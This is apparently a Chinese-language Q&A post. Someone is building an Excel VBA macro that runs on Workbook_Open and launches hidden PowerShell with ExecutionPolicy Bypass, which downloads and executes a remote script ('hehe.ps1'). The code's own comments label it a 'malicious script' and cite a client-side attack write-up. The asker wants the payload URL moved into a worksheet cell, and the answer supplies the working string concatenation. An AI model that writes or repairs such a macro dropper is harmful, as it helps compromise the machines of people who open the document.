我正在使用powershell和Excel尝试从远程服务器下载一些powershell文件,然后在VBA中执行它时在后台执行它。
以下代码可以正常使用。
Sub Workbook_Open()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
Dim MaURL As String
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.shell")
'Downloading malicious script and execution
MaURL = Worksheets("Script").Range("D15").Value
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://mywebsite.com/hehe.ps1'))"
'vbMaximizedFocus or vbHide
End Sub
现在我想更改VBA中的硬编码并从Excel工作表中的单元格中读取URL:
在D10中,我有Wscript.shell,到目前为止工作正常,但是当我尝试从D15读取我http://mywebsite.com/hehe.ps1并尝试以粗体更改上面的代码时,它并没有'工作。
Sub Workbook_Open()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
Dim MaURL As String
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject(Worksheets("Script").Range("D10").Value)
'Downloading malicious script and execution
MaURL = Worksheets("Script").Range("D15").Value
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(**MaURL**))"
'vbMaximizedFocus or vbHide
End Sub
答案 0 :(得分:2)
由于MaURL是一个变量,它不应该包含在执行字符串中,而应该连接到它上面。
尝试更改:
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(**MaURL**))"
到
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('" & MaURL & "'))"